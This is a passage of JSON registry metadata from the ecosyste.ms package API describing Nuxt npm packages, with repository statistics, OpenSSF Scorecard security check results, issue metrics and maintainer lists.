paces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096154,"name":"@nuxt/webpack-builder-edge","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1981,"first_release_published_at":"2021-07-01T12:51:50.682Z","latest_release_published_at":"2023-03-07T21:15:46.729Z","latest_release_number":"4.0.0-27970394.60d07df4","last_synced_at":"2026-05-11T01:23:26.455Z","created_at":"2022-04-08T10:39:40.557Z","updated_at":"2026-05-11T01:23:26.455Z","registry_url":"https://www.npmjs.com/package/@nuxt/webpack-builder-edge","install_command":"npm install @nuxt/webpack-builder-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.726Z","dependent_packages_count":2,"downloads":3657,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":1.885473655640061,"dependent_repos_count":10.767935900085632,"dependent_packages_count":8.786228889746779,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":null,"average":4.430296244773315},"purl":"pkg:npm/%40nuxt/webpack-builder-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/webpack-builder-edge","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/webpack-builder-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/webpack-builder-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2025-08-15T17:24:14.976Z","updated_at":"2025-08-15T17:24:14.976Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T15:19:49.529Z","updated_at":"2023-12-13T15:19:49.529Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11516417,"name":"@nuxt/docs","ecosystem":"npm","description":"Documentation for Nuxt in raw markdown","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":45,"first_release_published_at":"2025-04-03T15:18:25.258Z","latest_release_published_at":"2026-05-10T23:51:16.012Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-11T01:23:05.931Z","created_at":"2025-04-03T15:22:00.680Z","updated_at":"2026-05-11T01:23:05.931Z","registry_url":"https://www.npmjs.com/package/@nuxt/docs","install_command":"npm install @nuxt/docs","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- 